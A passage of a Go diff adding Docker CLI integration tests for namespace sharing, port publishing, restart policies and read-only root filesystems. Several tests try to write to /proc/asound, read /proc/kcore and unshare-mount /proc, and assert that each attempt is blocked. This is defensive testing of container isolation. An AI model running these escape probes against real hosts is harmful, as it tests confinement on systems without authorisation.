c.Assert(err, check.IsNil) + if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + c.Fatalf("Volume was not defined for %s/foo\n%q", prefix, out) + } + + out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar"+slash) + if err != errMountNotFound { + c.Fatalf("Found unexpected volume entry for '%s/bar/' in volumes\n%q", prefix, out) + } + + out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar") + c.Assert(err, check.IsNil) + if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + c.Fatalf("Volume was not defined for %s/bar\n%q", prefix, out) + } +} + +// Regression test for #3631 +func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) { + // TODO Windows: This should be able to run on Windows if can find an + // alternate to /dev/zero and /dev/stdout. + testRequires(c, DaemonIsLinux) + cont := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | catv") + + stdout, err := cont.StdoutPipe() + if err != nil { + c.Fatal(err) + } + + if err := cont.Start(); err != nil { + c.Fatal(err) + } + n, err := consumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil) + if err != nil { + c.Fatal(err) + } + + expected := 2 * 1024 * 2000 + if n != expected { + c.Fatalf("Expected %d, got %d", expected, n) + } +} + +func (s *DockerSuite) TestRunAllowPortRangeThroughExpose(c *check.C) { + // TODO Windows: -P is not currently supported. Also network + // settings are not propagated back. 
+ testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--expose", "3000-3003", "-P", "busybox", "top") + + id := strings.TrimSpace(out) + portstr := inspectFieldJSON(c, id, "NetworkSettings.Ports") + var ports nat.PortMap + if err := json.Unmarshal([]byte(portstr), &ports); err != nil { + c.Fatal(err) + } + for port, binding := range ports { + portnum, _ := strconv.Atoi(strings.Split(string(port), "/")[0]) + if portnum < 3000 || portnum > 3003 { + c.Fatalf("Port %d is out of range ", portnum) + } + if binding == nil || len(binding) != 1 || len(binding[0].HostPort) == 0 { + c.Fatalf("Port is not mapped for the port %s", port) + } + } +} + +func (s *DockerSuite) TestRunExposePort(c *check.C) { + out, _, err := dockerCmdWithError("run", "--expose", "80000", "busybox") + c.Assert(err, checker.NotNil, check.Commentf("--expose with an invalid port should error out")) + c.Assert(out, checker.Contains, "invalid range format for --expose") +} + +func (s *DockerSuite) TestRunModeIpcHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostIpc, err := os.Readlink("/proc/1/ns/ipc") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--ipc=host", "busybox", "readlink", "/proc/self/ns/ipc") + out = strings.Trim(out, "\n") + if hostIpc != out { + c.Fatalf("IPC different with --ipc=host %s != %s\n", hostIpc, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/ipc") + out = strings.Trim(out, "\n") + if hostIpc == out { + c.Fatalf("IPC should be different without --ipc=host %s == %s\n", hostIpc, out) + } +} + +func (s *DockerSuite) TestRunModeIpcContainer(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top") + + id := 
strings.TrimSpace(out) + state := inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid1 := inspectField(c, id, "State.Pid") + + parentContainerIpc, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/ipc", pid1)) + if err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "readlink", "/proc/self/ns/ipc") + out = strings.Trim(out, "\n") + if parentContainerIpc != out { + c.Fatalf("IPC different with --ipc=container:%s %s != %s\n", id, parentContainerIpc, out) + } + + catOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "cat", "/dev/shm/test") + if catOutput != "test" { + c.Fatalf("Output of /dev/shm/test expected test but found: %s", catOutput) + } + + // check that /dev/mqueue is actually of mqueue type + grepOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "grep", "/dev/mqueue", "/proc/mounts") + if !strings.HasPrefix(grepOutput, "mqueue /dev/mqueue mqueue rw") { + c.Fatalf("Output of 'grep /proc/mounts' expected 'mqueue /dev/mqueue mqueue rw' but found: %s", grepOutput) + } + + lsOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "ls", "/dev/mqueue") + lsOutput = strings.Trim(lsOutput, "\n") + if lsOutput != "toto" { + c.Fatalf("Output of 'ls /dev/mqueue' expected 'toto' but found: %s", lsOutput) + } +} + +func (s *DockerSuite) TestRunModeIpcContainerNotExists(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-d", "--ipc", "container:abcd1234", "busybox", "top") + if !strings.Contains(out, "abcd1234") || err == nil { + c.Fatalf("run IPC from a non exists container should with correct error out") + } +} + +func (s *DockerSuite) TestRunModeIpcContainerNotRunning(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + 
testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "create", "busybox") + + id := strings.TrimSpace(out) + out, _, err := dockerCmdWithError("run", fmt.Sprintf("--ipc=container:%s", id), "busybox") + if err == nil { + c.Fatalf("Run container with ipc mode container should fail with non running container: %s\n%s", out, err) + } +} + +func (s *DockerSuite) TestRunModePIDContainer(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "top") + + id := strings.TrimSpace(out) + state := inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid1 := inspectField(c, id, "State.Pid") + + parentContainerPid, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/pid", pid1)) + if err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", fmt.Sprintf("--pid=container:%s", id), "busybox", "readlink", "/proc/self/ns/pid") + out = strings.Trim(out, "\n") + if parentContainerPid != out { + c.Fatalf("PID different with --pid=container:%s %s != %s\n", id, parentContainerPid, out) + } +} + +func (s *DockerSuite) TestRunModePIDContainerNotExists(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-d", "--pid", "container:abcd1234", "busybox", "top") + if !strings.Contains(out, "abcd1234") || err == nil { + c.Fatalf("run PID from a non exists container should with correct error out") + } +} + +func (s *DockerSuite) TestRunModePIDContainerNotRunning(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "create", "busybox") + + id := strings.TrimSpace(out) + out, _, err := dockerCmdWithError("run", fmt.Sprintf("--pid=container:%s", id), "busybox") + if err == nil { + 
c.Fatalf("Run container with pid mode container should fail with non running container: %s\n%s", out, err) + } +} + +func (s *DockerSuite) TestRunMountShmMqueueFromHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + dockerCmd(c, "run", "-d", "--name", "shmfromhost", "-v", "/dev/shm:/dev/shm", "-v", "/dev/mqueue:/dev/mqueue", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top") + defer os.Remove("/dev/mqueue/toto") + defer os.Remove("/dev/shm/test") + volPath, err := inspectMountSourceField("shmfromhost", "/dev/shm") + c.Assert(err, checker.IsNil) + if volPath != "/dev/shm" { + c.Fatalf("volumePath should have been /dev/shm, was %s", volPath) + } + + out, _ := dockerCmd(c, "run", "--name", "ipchost", "--ipc", "host", "busybox", "cat", "/dev/shm/test") + if out != "test" { + c.Fatalf("Output of /dev/shm/test expected test but found: %s", out) + } + + // Check that the mq was created + if _, err := os.Stat("/dev/mqueue/toto"); err != nil { + c.Fatalf("Failed to confirm '/dev/mqueue/toto' presence on host: %s", err.Error()) + } +} + +func (s *DockerSuite) TestContainerNetworkMode(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + pid1 := inspectField(c, id, "State.Pid") + + parentContainerNet, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/net", pid1)) + if err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", fmt.Sprintf("--net=container:%s", id), "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if parentContainerNet != out { + c.Fatalf("NET different with --net=container:%s %s != %s\n", id, parentContainerNet, out) + } +} + +func (s *DockerSuite) TestRunModePIDHost(c *check.C) { + // Not 
applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostPid, err := os.Readlink("/proc/1/ns/pid") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--pid=host", "busybox", "readlink", "/proc/self/ns/pid") + out = strings.Trim(out, "\n") + if hostPid != out { + c.Fatalf("PID different with --pid=host %s != %s\n", hostPid, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/pid") + out = strings.Trim(out, "\n") + if hostPid == out { + c.Fatalf("PID should be different without --pid=host %s == %s\n", hostPid, out) + } +} + +func (s *DockerSuite) TestRunModeUTSHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + hostUTS, err := os.Readlink("/proc/1/ns/uts") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--uts=host", "busybox", "readlink", "/proc/self/ns/uts") + out = strings.Trim(out, "\n") + if hostUTS != out { + c.Fatalf("UTS different with --uts=host %s != %s\n", hostUTS, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/uts") + out = strings.Trim(out, "\n") + if hostUTS == out { + c.Fatalf("UTS should be different without --uts=host %s == %s\n", hostUTS, out) + } + + out, _ = dockerCmdWithFail(c, "run", "-h=name", "--uts=host", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictUTSHostname.Error()) +} + +func (s *DockerSuite) TestRunTLSVerify(c *check.C) { + // Remote daemons use TLS and this test is not applicable when TLS is required. 
+ testRequires(c, SameHostDaemon) + if out, code, err := dockerCmdWithError("ps"); err != nil || code != 0 { + c.Fatalf("Should have worked: %v:\n%v", err, out) + } + + // Regardless of whether we specify true or false we need to + // test to make sure tls is turned on if --tlsverify is specified at all + result := dockerCmdWithResult("--tlsverify=false", "ps") + result.Assert(c, icmd.Expected{ExitCode: 1, Err: "error during connect"}) + + result = dockerCmdWithResult("--tlsverify=true", "ps") + result.Assert(c, icmd.Expected{ExitCode: 1, Err: "cert"}) +} + +func (s *DockerSuite) TestRunPortFromDockerRangeInUse(c *check.C) { + // TODO Windows. Once moved to libnetwork/CNM, this may be able to be + // re-instated. + testRequires(c, DaemonIsLinux) + // first find allocator current position + out, _ := dockerCmd(c, "run", "-d", "-p", ":80", "busybox", "top") + + id := strings.TrimSpace(out) + out, _ = dockerCmd(c, "port", id) + + out = strings.TrimSpace(out) + if out == "" { + c.Fatal("docker port command output is empty") + } + out = strings.Split(out, ":")[1] + lastPort, err := strconv.Atoi(out) + if err != nil { + c.Fatal(err) + } + port := lastPort + 1 + l, err := net.Listen("tcp", ":"+strconv.Itoa(port)) + if err != nil { + c.Fatal(err) + } + defer l.Close() + + out, _ = dockerCmd(c, "run", "-d", "-p", ":80", "busybox", "top") + + id = strings.TrimSpace(out) + dockerCmd(c, "port", id) +} + +func (s *DockerSuite) TestRunTTYWithPipe(c *check.C) { + errChan := make(chan error) + go func() { + defer close(errChan) + + cmd := exec.Command(dockerBinary, "run", "-ti", "busybox", "true") + if _, err := cmd.StdinPipe(); err != nil { + errChan <- err + return + } + + expected := "the input device is not a TTY" + if runtime.GOOS == "windows" { + expected += ". 
If you are using mintty, try prefixing the command with 'winpty'" + } + if out, _, err := runCommandWithOutput(cmd); err == nil { + errChan <- fmt.Errorf("run should have failed") + return + } else if !strings.Contains(out, expected) { + errChan <- fmt.Errorf("run failed with error %q: expected %q", out, expected) + return + } + }() + + select { + case err := <-errChan: + c.Assert(err, check.IsNil) + case <-time.After(30 * time.Second): + c.Fatal("container is running but should have failed") + } +} + +func (s *DockerSuite) TestRunNonLocalMacAddress(c *check.C) { + addr := "00:16:3E:08:00:50" + args := []string{"run", "--mac-address", addr} + expected := addr + + if daemonPlatform != "windows" { + args = append(args, "busybox", "ifconfig") + } else { + args = append(args, WindowsBaseImage, "ipconfig", "/all") + expected = strings.Replace(strings.ToUpper(addr), ":", "-", -1) + } + + if out, _ := dockerCmd(c, args...); !strings.Contains(out, expected) { + c.Fatalf("Output should have contained %q: %s", expected, out) + } +} + +func (s *DockerSuite) TestRunNetHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostNet, err := os.Readlink("/proc/1/ns/net") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if hostNet != out { + c.Fatalf("Net namespace different with --net=host %s != %s\n", hostNet, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if hostNet == out { + c.Fatalf("Net namespace should be different without --net=host %s == %s\n", hostNet, out) + } +} + +func (s *DockerSuite) TestRunNetHostTwiceSameName(c *check.C) { + // TODO Windows. As Windows networking evolves and converges towards + // CNM, this test may be possible to enable on Windows. 
+ testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + dockerCmd(c, "run", "--rm", "--name=thost", "--net=host", "busybox", "true") + dockerCmd(c, "run", "--rm", "--name=thost", "--net=host", "busybox", "true") +} + +func (s *DockerSuite) TestRunNetContainerWhichHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostNet, err := os.Readlink("/proc/1/ns/net") + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-d", "--net=host", "--name=test", "busybox", "top") + + out, _ := dockerCmd(c, "run", "--net=container:test", "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if hostNet != out { + c.Fatalf("Container should have host network namespace") + } +} + +func (s *DockerSuite) TestRunAllowPortRangeThroughPublish(c *check.C) { + // TODO Windows. This may be possible to enable in the future. However, + // Windows does not currently support --expose, or populate the network + // settings seen through inspect. 
+ testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--expose", "3000-3003", "-p", "3000-3003", "busybox", "top") + + id := strings.TrimSpace(out) + portstr := inspectFieldJSON(c, id, "NetworkSettings.Ports") + + var ports nat.PortMap + err := json.Unmarshal([]byte(portstr), &ports) + c.Assert(err, checker.IsNil, check.Commentf("failed to unmarshal: %v", portstr)) + for port, binding := range ports { + portnum, _ := strconv.Atoi(strings.Split(string(port), "/")[0]) + if portnum < 3000 || portnum > 3003 { + c.Fatalf("Port %d is out of range ", portnum) + } + if binding == nil || len(binding) != 1 || len(binding[0].HostPort) == 0 { + c.Fatal("Port is not mapped for the port "+port, out) + } + } +} + +func (s *DockerSuite) TestRunSetDefaultRestartPolicy(c *check.C) { + runSleepingContainer(c, "--name=testrunsetdefaultrestartpolicy") + out := inspectField(c, "testrunsetdefaultrestartpolicy", "HostConfig.RestartPolicy.Name") + if out != "no" { + c.Fatalf("Set default restart policy failed") + } +} + +func (s *DockerSuite) TestRunRestartMaxRetries(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false") + timeout := 10 * time.Second + if daemonPlatform == "windows" { + timeout = 120 * time.Second + } + + id := strings.TrimSpace(string(out)) + if err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false false", timeout); err != nil { + c.Fatal(err) + } + + count := inspectField(c, id, "RestartCount") + if count != "3" { + c.Fatalf("Container was restarted %s times, expected %d", count, 3) + } + + MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + if MaximumRetryCount != "3" { + c.Fatalf("Container Maximum Retry Count is %s, expected %s", MaximumRetryCount, "3") + } +} + +func (s *DockerSuite) TestRunContainerWithWritableRootfs(c *check.C) { + dockerCmd(c, "run", "--rm", "busybox", "touch", "/file") +} + +func (s *DockerSuite) 
TestRunContainerWithReadonlyRootfs(c *check.C) { + // Not applicable on Windows which does not support --read-only + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + testPriv := true + // don't test privileged mode subtest if user namespaces enabled + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + testPriv = false + } + testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname", "/sys/kernel", "/dev/.dont.touch.me") +} + +func (s *DockerSuite) TestPermissionsPtsReadonlyRootfs(c *check.C) { + // Not applicable on Windows due to use of Unix specific functionality, plus + // the use of --read-only which is not supported. + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + // Ensure we have not broken writing /dev/pts + out, status := dockerCmd(c, "run", "--read-only", "--rm", "busybox", "mount") + if status != 0 { + c.Fatal("Could not obtain mounts when checking /dev/pts mntpnt.") + } + expected := "type devpts (rw," + if !strings.Contains(string(out), expected) { + c.Fatalf("expected output to contain %s but contains %s", expected, out) + } +} + +func testReadOnlyFile(c *check.C, testPriv bool, filenames ...string) { + touch := "touch " + strings.Join(filenames, " ") + out, _, err := dockerCmdWithError("run", "--read-only", "--rm", "busybox", "sh", "-c", touch) + c.Assert(err, checker.NotNil) + + for _, f := range filenames { + expected := "touch: " + f + ": Read-only file system" + c.Assert(out, checker.Contains, expected) + } + + if !testPriv { + return + } + + out, _, err = dockerCmdWithError("run", "--read-only", "--privileged", "--rm", "busybox", "sh", "-c", touch) + c.Assert(err, checker.NotNil) + + for _, f := range filenames { + expected := "touch: " + f + ": Read-only file system" + c.Assert(out, checker.Contains, expected) + } +} + +func (s *DockerSuite) TestRunContainerWithReadonlyEtcHostsAndLinkedContainer(c *check.C) { + // Not applicable on Windows which does not support --link + testRequires(c, 
DaemonIsLinux, UserNamespaceROMount) + + dockerCmd(c, "run", "-d", "--name", "test-etc-hosts-ro-linked", "busybox", "top") + + out, _ := dockerCmd(c, "run", "--read-only", "--link", "test-etc-hosts-ro-linked:testlinked", "busybox", "cat", "/etc/hosts") + if !strings.Contains(string(out), "testlinked") { + c.Fatal("Expected /etc/hosts to be updated even if --read-only enabled") + } +} + +func (s *DockerSuite) TestRunContainerWithReadonlyRootfsWithDNSFlag(c *check.C) { + // Not applicable on Windows which does not support either --read-only or --dns. + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + out, _ := dockerCmd(c, "run", "--read-only", "--dns", "1.1.1.1", "busybox", "/bin/cat", "/etc/resolv.conf") + if !strings.Contains(string(out), "1.1.1.1") { + c.Fatal("Expected /etc/resolv.conf to be updated even if --read-only enabled and --dns flag used") + } +} + +func (s *DockerSuite) TestRunContainerWithReadonlyRootfsWithAddHostFlag(c *check.C) { + // Not applicable on Windows which does not support --read-only + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + out, _ := dockerCmd(c, "run", "--read-only", "--add-host", "testreadonly:127.0.0.1", "busybox", "/bin/cat", "/etc/hosts") + if !strings.Contains(string(out), "testreadonly") { + c.Fatal("Expected /etc/hosts to be updated even if --read-only enabled and --add-host flag used") + } +} + +func (s *DockerSuite) TestRunVolumesFromRestartAfterRemoved(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + runSleepingContainer(c, "--name=voltest", "-v", prefix+"/foo") + runSleepingContainer(c, "--name=restarter", "--volumes-from", "voltest") + + // Remove the main volume container and restart the consuming container + dockerCmd(c, "rm", "-f", "voltest") + + // This should not fail since the volumes-from were already applied + dockerCmd(c, "restart", "restarter") +} + +// run container with --rm should remove container if exit code != 0 +func (s *DockerSuite) 
TestRunContainerWithRmFlagExitCodeNotEqualToZero(c *check.C) { + name := "flowers" + out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "ls", "/notexists") + if err == nil { + c.Fatal("Expected docker run to fail", out, err) + } + + out, err = getAllContainers() + if err != nil { + c.Fatal(out, err) + } + + if out != "" { + c.Fatal("Expected not to have containers", out) + } +} + +func (s *DockerSuite) TestRunContainerWithRmFlagCannotStartContainer(c *check.C) { + name := "sparkles" + out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "commandNotFound") + if err == nil { + c.Fatal("Expected docker run to fail", out, err) + } + + out, err = getAllContainers() + if err != nil { + c.Fatal(out, err) + } + + if out != "" { + c.Fatal("Expected not to have containers", out) + } +} + +func (s *DockerSuite) TestRunPIDHostWithChildIsKillable(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux, NotUserNamespace) + name := "ibuildthecloud" + dockerCmd(c, "run", "-d", "--pid=host", "--name", name, "busybox", "sh", "-c", "sleep 30; echo hi") + + c.Assert(waitRun(name), check.IsNil) + + errchan := make(chan error) + go func() { + if out, _, err := dockerCmdWithError("kill", name); err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + close(errchan) + }() + select { + case err := <-errchan: + c.Assert(err, check.IsNil) + case <-time.After(5 * time.Second): + c.Fatal("Kill container timed out") + } +} + +func (s *DockerSuite) TestRunWithTooSmallMemoryLimit(c *check.C) { + // TODO Windows. 
This may be possible to enable once Windows supports + // memory limits on containers + testRequires(c, DaemonIsLinux) + // this memory limit is 1 byte less than the min, which is 4MB + // https://github.com/docker/docker/blob/v1.5.0/daemon/create.go#L22 + out, _, err := dockerCmdWithError("run", "-m", "4194303", "busybox") + if err == nil || !strings.Contains(out, "Minimum memory limit allowed is 4MB") { + c.Fatalf("expected run to fail when using too low a memory limit: %q", out) + } +} + +func (s *DockerSuite) TestRunWriteToProcAsound(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + _, code, err := dockerCmdWithError("run", "busybox", "sh", "-c", "echo 111 >> /proc/asound/version") + if err == nil || code == 0 { + c.Fatal("standard container should not be able to write to /proc/asound") + } +} + +func (s *DockerSuite) TestRunReadProcTimer(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + out, code, err := dockerCmdWithError("run", "busybox", "cat", "/proc/timer_stats") + if code != 0 { + return + } + if err != nil { + c.Fatal(err) + } + if strings.Trim(out, "\n ") != "" { + c.Fatalf("expected to receive no output from /proc/timer_stats but received %q", out) + } +} + +func (s *DockerSuite) TestRunReadProcLatency(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + // some kernels don't have this configured so skip the test if this file is not found + // on the host running the tests. 
+ if _, err := os.Stat("/proc/latency_stats"); err != nil { + c.Skip("kernel doesn't have latency_stats configured") + return + } + out, code, err := dockerCmdWithError("run", "busybox", "cat", "/proc/latency_stats") + if code != 0 { + return + } + if err != nil { + c.Fatal(err) + } + if strings.Trim(out, "\n ") != "" { + c.Fatalf("expected to receive no output from /proc/latency_stats but received %q", out) + } +} + +func (s *DockerSuite) TestRunReadFilteredProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace) + + testReadPaths := []string{ + "/proc/latency_stats", + "/proc/timer_stats", + "/proc/kcore", + } + for i, filePath := range testReadPaths { + name := fmt.Sprintf("procsieve-%d", i) + shellCmd := fmt.Sprintf("exec 3<%s", filePath) + + out, exitCode, err := dockerCmdWithError("run", "--privileged", "--security-opt", "apparmor=docker-default", "--name", name, "busybox", "sh", "-c", shellCmd) + if exitCode != 0 { + return + } + if err != nil { + c.Fatalf("Open FD for read should have failed with permission denied, got: %s, %v", out, err) + } + } +} + +func (s *DockerSuite) TestMountIntoProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + _, code, err := dockerCmdWithError("run", "-v", "/proc//sys", "busybox", "true") + if err == nil || code == 0 { + c.Fatal("container should not be able to mount into /proc") + } +} + +func (s *DockerSuite) TestMountIntoSys(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + testRequires(c, NotUserNamespace) + dockerCmd(c, "run", "-v", "/sys/fs/cgroup", "busybox", "true") +} + +func (s *DockerSuite) TestRunUnshareProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace) + + // In this test goroutines are used to run 
test cases in parallel to prevent the test from taking a long time to run. + errChan := make(chan error) + + go func() { + name := "acidburn" + out, _, err := dockerCmdWithError("run", "--name", name, "--security-opt", "seccomp=unconfined", "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "--mount-proc=/proc", "mount") + if err == nil || + !(strings.Contains(strings.ToLower(out), "permission denied") || + strings.Contains(strings.ToLower(out), "operation not permitted")) { + errChan <- fmt.Errorf("unshare with --mount-proc should have failed with 'permission denied' or 'operation not permitted', got: %s, %v", out, err) + } else { + errChan <- nil + } + }() + + go func() { + name := "cereal" + out, _, err := dockerCmdWithError("run", "--name", name, "--security-opt", "seccomp=unconfined", "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") + if err == nil || + !(strings.Contains(strings.ToLower(out), "mount: cannot mount none") || + strings.Contains(strings.ToLower(out), "permission denied") || + strings.Contains(strings.ToLower(out), "operation not permitted")) { + errChan <- fmt.Errorf("unshare and mount of /proc should have failed with 'mount: cannot mount none' or 'permission denied', got: %s, %v", out, err) + } else { + errChan <- nil + } + }() + + /* Ensure still fails if running privileged with the default policy */ + go func() { + name := "crashoverride" + out, _, err := dockerCmdWithError("run", "--privileged", "--security-opt", "seccomp=unconfined", "--security-opt", "apparmor=docker-default", "--name", name, "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") + if err == nil || + !(strings.Contains(strings.ToLower(out), "mount: cannot mount none") || + strings.Contains(strings.ToLower(out), "permission denied") || + strings.Contains(strings.ToLower(out), "operation not permitted")) { + errChan <- fmt.Errorf("privileged unshare with apparmor should have failed with 'mount: 
cannot mount none' or 'permission denied', got: %s, %v", out, err) + } else { + errChan <- nil + } + }() + + for i := 0; i < 3; i++ { + err := <-errChan + if err != nil { + c.Fatal(err) + } + } +} + +func (s *DockerSuite) TestRunPublishPort(c *check.C) { + // TODO Windows: This may be possible once Windows moves to libnetwork and CNM + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "test", "--expose", "8080", "busybox", "top") + out, _ := dockerCmd(c, "port", "test") + out = strings.Trim(out, "\r\n") + if out != "" { + c.Fatalf("run without --publish-all should not publish port, out should be nil, but got: %s", out) + } +} + +// Issue #10184. +func (s *DockerSuite) TestDevicePermissions(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + const permissions = "crw-rw-rw-" + out, status := dockerCmd(c, "run", "--device", "/dev/fuse:/dev/fuse:mrw", "busybox:latest", "ls", "-l", "/dev/fuse") + if status != 0 { + c.Fatalf("expected status 0, got %d", status) + } + if !strings.HasPrefix(out, permissions) { + c.Fatalf("output should begin with %q, got %q", permissions, out) + } +} + +func (s *DockerSuite) TestRunCapAddCHOWN(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=CHOWN", "busybox", "sh", "-c", "adduser -D -H newuser && chown newuser /home && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +// https://github.com/docker/docker/pull/14498 +func (s *DockerSuite) TestVolumeFromMixedRWOptions(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "true") + + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform != "windows" || windowsDaemonKV >= 14350 
{ + dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true") + } + dockerCmd(c, "run", "--volumes-from", "parent:rw", "--name", "test-volumes-2", "busybox", "true") + + if daemonPlatform != "windows" { + mRO, err := inspectMountPoint("test-volumes-1", prefix+slash+"test") + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point")) + if mRO.RW { + c.Fatalf("Expected RO volume was RW") + } + } + + mRW, err := inspectMountPoint("test-volumes-2", prefix+slash+"test") + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point")) + if !mRW.RW { + c.Fatalf("Expected RW volume was RO") + } +} + +func (s *DockerSuite) TestRunWriteFilteredProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace) + + testWritePaths := []string{ + /* modprobe and core_pattern should both be denied by generic + * policy of denials for /proc/sys/kernel. 
